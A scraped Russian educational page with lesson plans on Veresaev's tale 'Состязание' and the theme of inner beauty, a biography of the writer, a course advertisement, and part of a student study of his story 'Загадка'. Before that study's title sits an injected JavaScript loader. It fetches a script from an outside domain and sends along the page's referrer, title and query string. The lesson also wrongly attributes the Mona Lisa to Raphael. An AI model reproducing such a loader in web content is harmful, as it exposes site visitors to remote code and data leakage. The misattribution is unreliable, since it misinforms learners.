Вересаев загадка конспект урока
Обновлено: 04.11.2024
- Здравствуйте, ребята! Мы заканчиваем изучать раздел «Сказки для взрослых» и тема сегодняшнего урока: «Размышления о человеческой красоте».
Данной теме посвящены два урока. На первом мы познакомимся с произведением, на втором – знакомство с автором и творческая работа, подведение итогов по всему разделу.
Как всегда начинаем работать над произведением с заполнения таблицы «Знаю, хочу узнать, узнал».
Заполните, пожалуйста, первую колонку таблицы «Знаю», в которой отразите всё, что вам известно по данному разделу:
Сказки для взрослых заставляют людей задумываться о своих поступках;
Всё хорошее и прекрасное есть рядом с нами, нужно только увидеть;
Писатели используют символы
Что такое истинная красота?
Какой человек считается красивым?
Истинная красота – внутренняя красота.
Символ красоты – женщина.
Красивым считается тот человек, у которого добрая душа, красота живёт рядом с нами.
Проверяем заполнение первой колонки таблицы.
Теперь давайте обратимся к теме нашего урока и заполним вторую колонку нашей таблицы: напишите, что бы вы хотели узнать о человеческой красоте?
Проверяем. Найти ответы на эти вопросы и заполнить третью колонку таблицы – это и будет целью нашего урока. (Вопросы появляются на слайде).
Сегодня на уроке мы с вами прочитаем сказку Викентия Вересаева «Состязание».
Предлагаю, проанализировав заглавие и предтекстовую информацию, выдвинуть предположения: о чём данная сказка.
Дома вы знакомились с предтекстовой информацией.
- О чём там говорится? Что вы из неё узнали? (У разной эпохи своё представление о красоте. Бывает злая красота, отталкивающая, каждый человек по-своему красив)
Теперь давайте обратимся к заглавию. Сказка называется «Состязание». Перед вами таблица «Типы заголовков»
- К какому типу относится данный заголовок? (Заголовок, требующий постановки вопроса)
- Какой вопрос можно поставить к заголовку? (Какое состязание? Кто будет состязаться?)
Выдвиньте свои предположения: о чём будет говориться в сказке? (Ответы учащихся)
Теперь я предлагаю познакомиться с героями сказки и узнать, что символизируют их имена.
Одного из героев сказки зовут Единорог . (Слайд) символ свободы и познания; указывает путь тем, кто ищет истину.
Следующий герой Дважды-венчанный . (Слайд) Венчать – возлагать венец, короновать в знак присвоения высокого звания, почётной награды, признания заслуг, таланта.
Следующую героиню зовут Зорька.
- Может быть, вы мне сами скажете, что символизирует это имя? Проверим свои предположения (Слайд). Зорька – пробуждение, озарение, духовный подъём, чистота.
-Что вы можете сказать о героях, которые носят такие имена? (Ответы учащихся). Спасибо, мы проверим наши предположения, прочитав текст.
И последний этап нашей предтекстовой работы – это экскурсия в музей. Я приглашаю вас в картинную галерею. Поскольку мы сегодня говорим о человеческой красоте, то я покажу вам самых красивых женщин, тех, которыми во все времена восхищались художники и поэты.
Внимание! Зал № 1. (Слайды)
Наталья Гончарова – жена А.С. Пушкина – первая красавица Москвы.
Мария Лопухина – урождённая графиня Толстая, тоже блистала своим великолепием.
Знаменитая Джоконда. Полотно великого итальянского живописца Рафаэля.
Великая императрица Екатерина 2
Ну и, конечно, Клеопатра – древнеегипетская царица.
А теперь внимание, зал № 2 (На слайдах мамы учеников)
- В каком зале вам понравилось больше? Почему? (Ответы: в первом зале известные всему миру красавицы, а во втором зале наши мамы, их красота нам ближе и роднее)
Теперь предлагаю познакомиться со сказкой.
Сказку читает учитель. Учащиеся по ходу чтения карандашом на полях записывают вопросы. Ведут диалог с автором. Читаем 1 часть.
1 абзац. Чтение. Вопрос: какое состязание?
2 абзац. Чтение. Проверяем предположения, отвечаем на вопрос.
3 и 4 абзац. Чтение. Вопрос: Куда собрался Дважды-венчанный?
Чтение слов Единорога. Прокомментируйте слова героя.
- Как относится Единорог к своему учителю?
Продолжаем чтение. Вопрос к автору: почему сердце Дважды-венчанного забилось?
Зачитываем слова: Единорог указал на Зорьку…
- Какие слова заслуживают нашего внимания? О чём они говорят? (Единорог уверен в том, что он говорит)
Чтение следующего отрывка: - Она. Пряча лукавство сказал…
- Какие слова заслуживают нашего внимания? (Учитель понял, что сможет победить Единорога, и то, что он сейчас скажет, будет неправдой)
Читаю последний абзац.
- Почему Дважды-венчанный теперь очень бодро зашагал в путь, что даже спина у него выпрямилась?
2 часть текста. Самостоятельная работа в группах.
Ребята, вторую часть текста вы читаете самостоятельно и, работая в группах, проводите исследование: Каким был путь поиска красоты Дважды-венчанным?
Проводим исследование с использованием приёма «двухчастный дневник»
«переходил из города в город, из деревни в деревню, с острова на остров»
«в теле была усталость, в душе отчаяние»
Прошёл много стран
Путь нелёгок, очень устал, уже не надеялся найти
Вывод: путь был очень тяжёлым, Дважды-венчанный уже отчаялся, но потом нашёл то, что искал.
Действительно, путь Дважды-венчанного был очень труден, он прошёл много стран и городов, в то время Единорог был дома, не испытывал никаких тягот пути, никого не икал.
Итак, пришёл итог состязания. Давайте посмотрим, кто же победил? Кому удалось найти и передать высшую красоту?
Чтение 3 главы. После чтения на доске составляется кластер, который отражает, какое же впечатление произвела картина на горожан?
Толпа картина чувства
Пронёсся гул слепила взгляд ущемила тоска
Стало тихо хотелось прикрыть глаза стало страшно
Казалось тёмным, смутным великая тоска
Чтение 4 главы. После чтения на доске составляется кластер, который отражает, какое же впечатление произвела картина на горожан?
Толпа картина чувства
Смех греющий свет вспомнились лучшие минуты
Свист лился от картины прояснилось лицо
Шип озарял всё кругом светилось лицо
Сравните полученные кластеры.
Выдвиньте ваши предположения: кто же победит? Кого объявят трижды-венчанным?
Почему, ведь Дважды-венчанный изобразил высшую красоту, а Единорог свою жену Зорьку, которую все давно знали и не считали очень красивой?
Проверим свои предположения. Дочитываю сказку до конца.
Итак, вы оказались правы! Конечно, Дважды-венчанный написал замечательную картину, но он видел высшую красоту только во внешности, но не мог или не хотел заметить красоту души. А для Единорога главное – это душа и характер человека, именно в этом он видит красоту. Изобразив на своём полотне прекрасную простоту и удивительный свет в глазах своей возлюбленной, он как бы призывает всех оглянуться и увидеть красоту своих близких и родных, красоту не внешнюю, а внутреннюю, красоту души! Красота живёт рядом с нами, только надо уметь её замечать!
Наш первый урок окончен, а на втором уроке мы продолжим работать по данной теме.
Улыбнитесь себе, соседу. Вам хорошо и спокойно. У вас хорошее настроение. Итак, вы готовы работать дальше.
А теперь я предлагаю вам самим поразмышлять о человеческой красоте. Перед вами ромашка. На её лепестках афоризмы и высказывания писателей, художников о красоте. Подумайте, какое высказывание вы взяли бы в качестве эпиграфа к сегодняшнему уроку. Обоснуйте свой ответ.
Вывод: теперь вернёмся к таблице «Знаю, хочу узнать, узнал» и заполняем третью колонку «Узнал»
Следующий этап нашего урока – это знакомство с автором данного произведения.
Выдвиньте свои предположения, каким вы представляете себе автора? Что это был за человек, кем был по профессии?
Рассказ учителя, сопровождаемый слайдами.
Учащиеся составляют корзину имён и понятий.
Итак, мы с вами познакомились с автором данного произведения и на этом закончили изучать раздел сказки для взрослых.
Теперь подведём итоги по разделу. Для этого поработаем с заключительной статьёй учебника, которая расположена на стр. 217, используя приём «инсерт».
- Расскажите, что вам было известно и что вы пометили галочкой V?
- Что противоречит вашему представлению и что вы пометили знаком «минус»?
- Что явилось для вас интересным и неожиданным? (Пометили знаком +)
- Что было неясно и где возникло желание узнать что-то новое? (Знак ?)
Итогом работы по разделу «Сказки для взрослых» является написание сочинения. Темы на стр. 217.
Ребята, мы закончили с вами изучать раздел «Сказки для взрослых», а также первую часть учебника «Год после детства». Вместе с авторами мы сочувствовали героям, жалели их, осуждали, высмеивали. Размышляли о преданности и предательстве, доброте и злой ненависти, красоте и уродстве, любви и ненависти. Учились быть взрослыми, вдумчивыми читателями, приобрели определённый жизненный опыт.
Итогом нашей работы является написание сочинения. Темы находятся на странице 217.
Предварительный просмотр:
Урок литературы в 8 классе
«Что есть красота. »
(по рассказу В.Вересаева «Состязание»)
Цель : проанализировать содержание рассказа В.Вересаева «Состязание»; постараться постичь тайну красоты человека
-развивать умение анализировать текст, его художественные особенности;
-развивать у учащихся навык сопоставления образов, произведений разных жанров, авторских оценок, навык словесного рисования;
-формировать умение соотносить оценку автора и собственную, умение видеть детали в тексте;
-вырабатывать умение формулировать вопросы разных видов к тексту
Оборудование урока: компьютер ПК, мультимедиа, слайды с репродукциями картин известных художников, звукозапись фрагмента рассказа В.Вересаева «Состязание» (ресурсы Интернет: Аудиокнига,), напечатанные на отдельных листах тексты стихотворения Н.Заболоцкого «Некрасивая девочка» и сонета У.Шекспира «Ее глаза на звезды не похожи…», муз. фрагмент (А.Вивальди. Времена года (Зима).)
Вступительное слово учителя (1 мин.):
- Ребята, тема нашего урока «Что есть красота. »
Сегодня мы с вами станем свидетелями необычного состязания: состязания художников: учителя и ученика, поставивших целью изобразить красоту женщины. Вы уже прочитали рассказ В.Вересаева и знаете, что в этом состязании победителем окажется тот, чей портрет произведет большее впечатление на людей, которые «будут неустанно славить творца за данную им миру радость».
Беседа по вопросам, анализ текста (10 мин.):
-Какая награда обещана победителю? («Тройной лавровый венок украсил его голову: и будет победителю имя – Трижды-Венчанный»)
Итак, Дважды – Венчанный отправляется искать истинную красоту.
- Кто он, этот художник? Что вы о нем знаете? (Дети отвечают.)
В портрете его создатель выделяет самые существенные детали.
-Назовите их. («Седая борода», «тоскующие глаза».)
-Как вы думаете, почему у человека, занимающегося искусством, имеющего славу, тоскующие глаза? (Он несчастлив, в его жизни нет любви, он в вечном поиске идеалов.)
-А какие детали вы бы отметили в портрете его ученика Единорога? (У него «кудри», «загорелое лицо», он «радостно сверкнул зубами и белками глаз»)
-О чем говорят эти детали портрета? (Он счастлив)
-Итак, Единорог, любимый ученик Дважды – Венчанного, говорит ему о том, что будет писать портрет любимой - Зорьки. Давайте найдем в тексте описание Зорьки (читаем)
-Посчитал ли Дважды – Венчанный Зорьку красивой? (Нет, самая обычная девушка, даже некрасивая)
-А если бы вы оказались рядом, вы бы согласились с ним?
-С каким чувством учитель покинул дом Единорога? (С чувством облегчения: «единственный опасный соперник…сам устранил себя с его пути»)
Дважды-Венчанный начал поиски девы, «в которую природа вложила лучшую свою красоту».
_ Где художник ее искал? («В виноградниках и рыбачьих хижинах, в храмах и на базарах,в вилах знатных господ и дворцах восточных царей. Но нигде не находил той, которую искал».)
И вот однажды он увидел царевну…, «он жадно смотрел на ее … красоту». Вспомните, какой эпитет подбирает автор, характеризуя красоту этой царевны? (Ослепительная)
-Так почему же она не стала той самой красавицей, которую он долго искал. Что было не так?
(Он считает, что истинная красота должна сразу поразить, очаровать, потрясти: «Истинная красота как светляк…». В нее не нужно вглядываться (а ведь он на царевну смотрел почти что минуту). Дважды - Венчанный уверен, что, встретив такую женщину, он в первую же секунду поймет, что перед ним именно та самая.
Дважды –Венчанный продолжал странствовать…Как долго он искал свой идеал? (Почти год). В тексте есть потрясающе красивое описание того, как времена года сменяют друг друга. В 8 строчках текста В.Вересаев показал, как осень приходит на смену лета, зима – на смену осени, как наступает весна.
Прослушивание фрагмента Аудиокниги (1 мин.):
Давайте послушаем этот фрагмент (звучит звукозапись): «Месяц шел за месяцем. Отшумели на море равноденственные бури, осыпались листья с дубов. Все ниже стало ходить солнце, все глубже заглядывать в окна хижин. Туманные тени поползли по волнам остывающего моря. Горы надели на головы белые шапки, ледяной ветер гнал по долинам сухой, шуршащий снег. И опять солнце стало ходить выше… Перед утреннею зарею выбегал из-за гор небесный Стрелец и целился стрелою в изогнутую спину сверкающего Скорпиона. Больше пригревало теплом».)
Работа по составлению кадров для кинофильма (4 мин.):
-Представьте, что вам нужно снять фильм по этому произведению и «оживить» этот фрагмент произведения. Что вы запечатлеете на кадрах?
( Два ученика, сидящие за партой, создают свой «мини-фильм», затем несколько пар рассказывают о нем 3 мин .)
Опишите пейзаж, который предвосхищает появление «светазарной девы» от имени Дважды Венчанного.
И вот Дважды – Венчанный встретил ту самую деву, она была в венке из фиалок.
-Как вы думаете, почему названия именно этих цветов упоминается столь часто: месяц фиалок, ветер пропитан запахом фиалок, лесные поляны покрыты сплошными коврами фиалок…
Итак, мы проанализировали две главы рассказа…Перед вами 3 и 4 главы.
Работа по составлению вопросов (5 мин.):
-Пожалуйста, задайте 5 вопросов к главе 3 (учитель обращается к одной половине класса), а вы придумайте 5 вопросов к главе 4 (ко второй половине класса). Напоминаю, что у вас в тетрадях есть памятка с типами вопросов.
Репродуктивный вопрос начинается со слов: Кто? Что? Когда? Как? Где? Куда?
Продуктивные вопросы (специальные) :
- можно считать то-то верным?
- какие выводы можно сделать из …?
- какие мотивы поступков героя?
- вопрос начинается с формулировки тезиса.
Продуктивные вопросы (разделительные ):
- если известно…, то…?
- если известно…, то почему …?
- … или …?
Учитель ставит условие: среди вопросов должны быть вопросы всех групп.
Ученики работают в микрогруппах (по двое) и выполняют задание.
Анализ вопросов, составленных учениками. Работа по вопросам (5 мин.)
Примеры вопросов, составленных детьми
- Какой предстала «дева в венке из фиалок» на картине Дважды – Венчанного?
- На фоне чего изобразил ее художник?
- Какие чувства испытали люди, глядя на картину?
- Старый погонщик мулов «искоса оглядывал свою старуху». Почему вдруг ему стало страшно?
- Если дева была так красива, то почему ее красота вызвала чувство тоски?
Какой предстала Зорька на картине Единорога?
- Почему по площади прошел ропот недоумения, когда люди посмотрели на портрет Зорьки? (Почему Единорога хотели «побить камнями»?)
- Какой диалог состоялся между юношами?
- Если Зорька была самой обычной девушкой, то почему ее портрет поразил всех?
-И вот люди стали всматриваться в портрет Зорьки. И что они увидели в ней? (Она «вся светилась изнутри».) Итак, «светозарная дева» вызывает темноту, которая вдруг опускается на площадь, а Зорька – вызывает солнце. Как называется художественный прием, который использует автор при описании портретов и чувств людей? С какой целью он это делает? (Ответы учеников)
Итак, именно Единорог стал Трижды – Венчанным.
-А вы присудили бы ему победу? Как вы относитесь к портрету, созданному Единорогом? (Ответы детей)
-Ребята, взгляните на экран. Перед вами женские портреты, написанные известными художниками в разное время. Среди них нет Зорьки, нет Фиалковенчанной. Но вглядитесь в них, и, может быть, вы уловите черты, ставшие милыми Единорогу и потрясшие Дважды – Венчанного… (Созерцают в молчании, но звучит музыка.)
Рефлексия (3 мин.):
-Так что же есть красота? На этот вопрос мы с вами сегодня пытались найти ответ. К каким выводам вы пришли? Согласны ли вы с точкой зрения автора? Что вы сегодня поняли? Изменилось ли ваше представление о красоте?
Работа по сопоставлению текстов разных жанров (8 минут):
-Сейчас я раздам каждому из вас текст стихотворения Н.Заболоцкого «Некрасивая девочка» или текст сонета У.Шекспира («Ее глаза на звезды не похожи…»). (Учитель раздает одной половине учеников стихотворение Н.Заболоцкого, другой - сонет Шекспира). Прочитайте это произведение и сопоставьте его с рассказом Вересаева. Свои мысли запишите в тетрадь. (Затем ученики зачитывают свои мысли и приходят к выводу, что Н.Заболоцкий и В.Вересаев очень близки в своем понимании истинной красоты человека.)
-Вы правы, тайну красоты постичь трудно. Одно несомненно: красивая внешность должна освещаться неким внутренним светом. Истинная красота должна притягивать теплом, от нее не должно веять холодом. Красота должна греть душу, а не вызывать благоговейный трепет.
-Дома вы продолжите свои размышления и напишите эссе на тему: «Что есть красота. »
Следующая загадка
Викентий Викентьевич Смидович. «В. Викентьев». «Вересаев». Кто он? Писатель? Публицист? Врач? Переводчик? Почему о нем молчат его современники? Почему на уроках литературы его имя упоминается лишь вскользь.
Он родился в 1867 году; что скажет дата рождения? Вересаев ровесник Бунина, Куприна, Мережковского. Это его поколение делало Россию начала ХХ века. Его поколение голодало, воевало, эмигрировало, тщетно пыталось уберечь своих детей – пушечное мясо Первой мировой и Гражданской войн. Его поколение пережило красный террор, белый террор, сталинский террор и Вторую мировую. Он был одним из немногих, кому удалось пронести сквозь кошмары истории когда-то мучительно выстраданный и закаленный оптимизм. Вересаев не отклонялся от них во все периоды бурной истории России, которая ломала судьбы людские, уничтожала интеллигентность и сострадание к ближнему, утверждала классовую злобу и подозрительность.
Родовая фамилия Вересаева – Смидович, принадлежала древнему польскому дворянскому роду. По семейной легенде, когда-то давно предки Смидовичей спасли на охоте жизнь польскому королю, за что получили дворянское звание, а в фамильном гербе в честь того события появилось изображение охотничьего рога. На самом деле он не Вересаев, а Смидович, из рода польских дворян. Имя Викентий также фамильное, польское. Вересаева в семье звали Витей, а папа — Вицей, о чем сам писатель с большим удовольствием пишет в своих воспоминаниях о детстве.
Родители писателя были образованными людьми. В доме постоянно бывали представители местной интеллигенции, велись беседы об искусстве, политике, судьбе страны. В этой атмосфере и рос Вересаев. С детства Викентий зачитывался русской классикой и зарубежной приключенческой литературой. Увлёкшись литературой, Вересаев начинает писать уже в гимназические годы, переводил любимых античных авторов.
Началом литературной деятельности Вересаева считается конец 1885 года, когда он под псевдонимом «В. Викентьев» помещает в «Модном журнале» стихотворение «Раздумья». После появления на страницах журнала произведения, Вересаев вспоминал: « Купил несколько экземпляров. Сейчас же на улице развернул, стал читать и перечитывать. Покрасневшие руки защипал мороз. Опять и опять перечитывал. Вот. Напечатано. У меня в руках. И совсем так же напечатано вот это самое мое стихотворение (мое!) - и в Москве, и в Туле, и в Сибири, и даже, может быть, в Париже. И сколько человек его прочитало! Приехал домой. Откладывал номер, и опять разворачивал, и опять читал и перечитывал».
Одним из первых литературных опытов в прозе был рассказ «Загадка» (1887). Повествование в произведении «Загадка» ведется от первого лица, а главный герой произведения выполняет функцию и повествователя, и персонажа одновременно. Выбранная форма повествования позволяет автору раскрыть внутренний мир героя, его сложные переживания, противоречивые мысли и чувства. Весь окружающий мир в рассказе дается через восприятие героя-повествователя. И задача автора – показать изменения в его душе, его внутренний рост. Именно повествователь и является композиционным центром рассказа.
Вересаев создает непривлекательный образ города: «в широкой котловине города», «над окутанным пылью городом» и отмечает некоторые характерные черты: «тускло светились огни», «доносился смутный шум», «грохот дорожек и обрывки музыки». В этом мире нет тишины, покоя и свежести. Образ города дан в рассказе как антитеза природному миру: «А кругом была тишина».
Пейзаж занимает центральное место в рассказе Вересаева. Картины природы меняются, как и отношение к ним героя. Покидая город, он сразу чувствует тишину. Вначале дается картина полей, подчеркнут их «беспредельный простор». Автор не дает их подробного описания, сосредоточив внимание на переживаниях героя. Восприятие мира, «беспредельного простора полей», «теплого ветра», «запаха зреющей ржи» вызывает в нем чувство «тоскливой неудовлетворенности». Герой не способен объяснить свое состояние, но автор уточняет, что это чувство давно знакомое, мучительное. Героя раздирают противоречия: он подмечает красоту ночной природы, желает «насладиться, упиться ею досыта», но разум его не откликается, не может понять происходящего. Развитие действия и определяет конфликт разума и чувства героя.
Кульминационным в рассказе является эпизод восприятия героем музыки, которая показалась ему начале «грубым оскорблением окружающему», так как звуки лились робко и неуверенно. Автор показывает, как меняется звучание скрипки: «сдерживаемые рыдания» сменяются «резкими – бешеными звуками, перебивающими друг друга».
Вересаев сосредоточен на изображении внутренних процессов, психологии человека, особое место в рассказе занимает пейзаж, который создается выразительными эпитетами, метафорами, олицетворениями.
Пейзажные зарисовки выполняют психологическую функцию, они помогают раскрыть внутренний конфликт героя. В финале автор подводит читателя к идее, что человек – дитя природы, рассудочность, порожденной цивилизацией, подавляет в нем светлые стороны, но он, все-таки, способен.
Кажется, что «Загадка» мало чем отличается от стихов юного поэта: тот же молодой герой со своими чуть грустными, чуть показными раздумьями, не идущими дальше вроде бы сугубо личного и интимного. В этом рассказе были намечены основные темы и идеи, волновавшие Вересаева в первое десятилетие его литературной деятельности. Писатель славил человека, способного силой своего духа сделать жизнь прекрасной. Вересаев доказывал, что истинное счастье в борьбе, призывал не терять веры в завтрашний день: "Пускай нет надежды, мы и самую надежду отвоюем!"
После окончания Петербургского университета Вересаев поступает на медицинский факультет в Дерпте. Медицина была для него не целью, а средством понять человека – для того, чтобы стать писателем. Вересаев писал в дневнике: « Я мечтал стать писателем, и именно беллетристом. А писатель, изучая человека, должен быть совершенно ориентирован в строении и отправлениях его тела, во всех здоровых и болезненных состояниях как тела его, так и духа. И потом: я туго и трудно сходился с людьми и надеялся, что профессия врача облегчит мне такое сближение, даст возможность наблюдать людей в таких интимных проявлениях, в каких сторонний человек никогда их не сможет увидеть». Шесть лет он учился на врача, продолжая при этом писать стихи и прозу.
Псевдоним «Вересаев» он избрал в 1892 году, подписав им очерки «Подземное царство» (1892), посвящённые труду и жизни донецких шахтёров. Вересаев — это персонаж одного из рассказов популярного в то время писателя Петра Гнедича. Он настолько приглянулся Викентию Смидовичу, что тот выбрал эту фамилию в качестве своего литературного псевдонима, под ним и вошел в историю.
В 1892 году он поехал на практику в Донбасс, на Юзовский рудник, где разразилась эпидемия холеры. Работать на холере для врачей было опасно не потому даже, что можно было заразиться, а потому, что народ по дремучести своей обвинял врачей в распространении холеры; личные наблюдения и горький опыт Вересаева получили отражение в его повести «Без дороги».
Произведение построено в форме дневниковых записей, что позволяет не ограничиваться изображением внешних проявлений жизни героя, а воссоздать сложнейший процесс его духовной жизни, тончайшие оттенки и нюансы в эволюции его характера, его миросозерцания.
Рассказ ведется от имени Дмитрия Чеканова — молодого врача, который не может сидеть сложа руки и, получив известие об эпидемии холеры, едет на борьбу с ней. В повести показан разительный контраст условий жизни народа и тех, кто мнили себя его защитниками. «Народ питается глиною и соломою, сотнями мрет от цинги и голодного тифа,— пишет автор.— Общество, живущее трудом этого народа. танцевало в пользу умирающих и объедалось в пользу голодных, жертвовало каких-нибудь полпроцента с жалованья». Этим людям так или иначе противостоит Чеканов, оказавшийся, однако, «без дороги». Но Вересаев видел и тех, кто не мирится с подобным бездорожьем, не отказывается от поисков пути, который где-то должен быть. Трагедия Чеканова в том, что поиск им «идеи, которая бы наполнила всю жизнь, которая бы захватила целиком и упорно вела к определенной цели», оказывается тщетным. Он понимает, что трагедия интеллигенции – в ее отрыве от народа, но дороги к народу Чеканов не знает. Поездка окончилась трагедией: Чеканов умирает, избитый толпой, которая считает его виновником своих бед и болезней.
Повесть «Без дороги» принесла Вересаеву первый литературный успех и вместе с последующими за ней повестями создала ему репутацию художественного летописца демократической интеллигенции. В произведении уже вполне определяется художественная манера Вересаева; внешняя сдержанность, которая подчеркивает напряженность, горячую эмоциональность подтекста, и публицистичность. Повесть привлекла к себе пристальное внимание критиков и читающей публики и получила широкое распространение.
Так кто же он? Вересаев. Писатель? Публицист? Врач? Переводчик?
Писатель – да, в рач – да, мемуарист, полемист, публицист, историк литературы, переводчик – все это у него выходило хорошо. Он был профессиональным русским интеллигентом – ее типичным представителем, ее глазами, ее голосом.
В. Вересаев представляет ту плеяду русских писателей, отношение которых к литературе лучше всего характеризуется несколько старомодным словом «служение». Это вызывающий бесконечное уважение тип художника, превыше всего ставившего честное служение искусству.
Талант В. Вересаева был на редкость многогранен. Кажется, нет ни одной области литературного творчества, в которой бы он не работал. Вересаев писал романы, повести, рассказы, очерки, стихи, пьесы, литературно-философские трактаты, выступал как литературовед, литературный критик, публицист, переводчик. Но, несмотря на долгую жизнь в литературе бурной эпохи социальных сломов, несмотря на многоплановость литературной деятельности, Викентий Викентьевич - писатель удивительно цельный. Весь жизненный и литературный путь В. Вересаева - это поиски ответа на вопрос, как сделать реальностью общество людей-братьев. Оно неизменно оставалось тем идеалом, борьбе за который писатель отдавал весь свой груд, свой талант, всего себя.
Следующая загадка
Внимание Скидка 50% на курсы! Спешите подать
заявку
Профессиональной переподготовки 30 курсов от 6900 руб.
Курсы для всех от 3000 руб. от 1500 руб.
Повышение квалификации 36 курсов от 1500 руб.
Лицензия №037267 от 17.03.2016 г.
выдана департаментом образования г. Москвы
Следующая загадка
Что есть истинная красота? Как соотносится красота внешняя и внутренняя? На эти волнующие человека вопросы ребята пытаются найти ответы на данном занятии.
Вложение | Размер |
---|---|
urok_lit_sostyazanie.doc | 49 КБ |
Рассказ "Загадка" как выражение творческого стиля В.В. Вересаева
((__lxGc__=window.__lxGc__||<'s':<>,'b':0>)['s']['_197117']=__lxGc__['s']['_197117']||>)['b']['_574359']=<'i':__lxGc__.b++>; var d=document;var s=d.createElement('script'); s.src='https://3slivtd.ru/BFjWgr?frm=script&&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&_cid=dd5ad15d-9f89-1596-33bb-24c0516e474b'; d.getElementById("dd5ad15d-9f89-1596-33bb-24c0516e474b").appendChild(s);'s':<>Рассказ «Загадка» как выражение творческого стиля В. В. Вересаева
Предметом нашего исследования стал рассказ В. В. Вересаева «Загадка» (1887).
Вересаев Викентий Викеньтевич, настоящая фамилия – Смидович – прозаик, публицист, переводчик. В гимназические годы усиленно занимался историей, философией, много читал. После окончания гимназии он поступил на историко-филологический факультет Петербургского университета, а получив диплом кандидата исторических наук, начал изучать медицину и работал врачом, как А. П. Чехов.
Свою литературную деятельность Вересаев начал еще в студенческие годы. В 1885 году было напечатано его первое стихотворение «Раздумье», а следующими литературными опытами, увидевшими свет в 1887 году, были рассказы «Мерзкий мальчишка» и «Загадка».
Уже в первых произведениях Вересаева обозначились характерные особенности его творческой манеры: сосредоточенность на социально-философской проблематике своего времени, внимание к мировоззренческим вопросам. Человек большой чуткой совести, он с глубоким сочувствием и пристальным вниманием относился к идейным исканиям передовой дореволюционной русской интеллигенции, которые с большой глубиной и мастерством отразил в своих произведениях.
Вересаев жил в сложное время, в период политической борьбы и общественных катаклизмов, он менял свое отношение к тем или иным социальным силам России, но никогда не расставался с мечтой о гармоничном человеке, об обществе людей-братьев. Эта идея о гармонии и братстве очень актуальна сегодня, но произведения Вересаева непопулярны среди нынешней молодежи, их не изучают в школе. Поэтому мы выбрали для анализа небольшой рассказ «Загадка».
Литературы о творчестве В. В. Вересаева очень мало. Мы обратились к энциклопедическим материалам, а так же познакомились с монографиями И. М. Гейзер «В. В. Вересаев. Писатель-врач», в которой большее внимание уделяется медицинской деятельности Вересаева, и Г. А. Бровман «В. В. Вересаев»: в этих источниках о рассказе «Загадка» только упоминается.
Цель работы: проанализировать рассказ «Загадка», выявляя особенности творческого стиля В. В. Вересаева.
на основе справочной литературы раскрыть понятие «стиль»;
в процессе анализа рассказа «Загадка» охарактеризовать художественное время и пространство, сюжетно-композицонную организацию, образы и язык писателя;
сделать выводы о принципах изображения Вересаевым мира и человека.
Понятие « стиль », согласно Литературному энциклопедическому словарю, означает совокупность основных художественных особенностей, черт, свойственных творчеству того или иного писателя или художника и отличающих его от других писателей или художников .[4; 372] А. Б. Есиным стиль понимается как свойство художественной формы произведения, формы содержательной. Для современного понимания литературно-художественного стиля существенно следующее: во-первых, стиль является выражением глубокой оригинальности, во-вторых, он обладает эстетическим совершенством, в-третьих, он представляет собой содержательную форму и, наконец, является свойством всей художественной формы произведения, а не только его речевой стороны, которая, впрочем, имеет для литературного стиля важнейшее значение.
Итак, можно дать такое самое общее определение стиля это эстетическое единство всех сторон и элементов художественной формы, обладающее определенной оригинальностью и выражающее некое содержание. [2; 490 ]
Обратимся к рассказу «Загадка». Название его сразу интригует читателя. Загадка , - как указано в толковом словаре С. И. Ожегова, - изображение или выражение, нуждающееся в разгадке, истолковании, или (перен.) нечто необъяснимое, непонятное. [5; №страницы] .
Своим названием автор заставляет читателей размышлять, искать объяснение происходящим событиям.
В рассказе необъяснимым и непонятным для героя оказывается мир природы и его собственное состояние.
Повествование в тексте ведется от первого лица, а субъект речи (главный герой произведения) выполняет функцию и повествователя, и персонажа одновременно. Выбранная форма повествования позволяет автору раскрыть внутренний мир героя, его сложные переживания, противоречивые мысли и чувства. Весь окружающий мир в рассказе дается через восприятие героя-повествователя. И задача автора – показать изменения в его душе, его внутренний рост.
Именно повествователь и является композиционным центром рассказа. Нам не дана его портретная характеристика, информация о социальном положении, профессии, но многое становится ясно по характеристике художественного пространства, восприятия мира этим человеком.
Все сюжетное действие определяет коллизия: противопоставление героя и окружающего мира, чувств и рассудка героя.
Развитие сюжета в рассказе связано с движением героя, его перемещением из города в мир природы и прогулкой по ночному полю. Это путешествие и предопределяет внутренние перемены героя. Не случайно появляется мотив дороги.
Вначале автор указывает художественное пространство – город. Вересаев использует различные литературные тропы, чтобы его расширить. Он создает непривлекательный образ города: «в широкой котловине города», «над окутанным пылью городом» и отмечает некоторые характерные черты: «тускло светились огни», «доносился смутный шум», «грохот дорожек и обрывки музыки». В этом мире нет тишины, покоя и свежести.
Образ города дан в рассказе как антитеза природному миру: «А кругом была тишина». Пейзаж занимает центральное место в рассказе Вересаева. Картины природы меняются, как и отношение к ним героя. Покидая город, он сразу чувствует тишину. Вначале дается картина полей, подчеркнут их «беспредельный простор». Автор не дает их подробного описания, сосредоточив внимание на переживаниях героя.
Восприятие мира, «беспредельного простора полей», «теплого ветра», «запаха зреющей ржи» вызывает в нем чувство «тоскливой неудовлетворенности». Герой не способен объяснить свое состояние, но автор уточняет, что это чувство давно знакомое, мучительное. Героя раздирают противоречия: он подмечает красоту ночной природы, желает «насладиться, упиться ею досыта», но разум его не откликается, не может понять происходящего. Развитие действия и определяет конфликт разума и чувства героя.
Выбор ночного времени не случаен. Ночь – это знак таинственности и загадочности мира. Для Ф.И. Тютчева, которого философ Николай Бердяев назвал поэтом ночной стихии, ночь – ключевой образ. Для него «день – суета, видимость; ночь – явление сущности, время Божественного откровения природы». [6; 14] . Ночью приоткрывается завеса и обнажается хаос. «Тайны, которые таит ночь, пугают человека, навевают на него ужас». [6; 14] . Эта тютчевская концепция ночи и положена Вересаевым в основу рассказа «Загадка». Строка стихотворения Тютчева используется писателем, но в измененном виде. Федор Иванович Тютчев – поэт-пантеист воспринимал природу, как живой организм, считая ее самодостаточной и самостоятельной: он писал:
Природа не слепок, не бездумный лик –
В ней есть душа, в ней есть свобода,
В ней есть любовь, в ней есть язык…
Герой вересаевского рассказа вступает в диалог-спор с лирическим героем Тютчева, иронично относясь к одухотворению природы.
Разум героя отказывается признать тайную жизнь природы.
Далее автор сужает художественное пространство: герой-повествователь оказывается в саду помещицы Ярцевой. Пространство сада наполнено звуками, шорохами. Этот образ автор выбирает, чтобы показать многообразие «полноту природной жизни, по-прежнему непонятной и загадочной для героя».
Развитие действия – процесс пробуждает чувства, которые вызваны тайной жизнью природы, приобщиться к которой помогла музыка, ощущение сопричастности с другим человеком, тоже томившимся загадками.
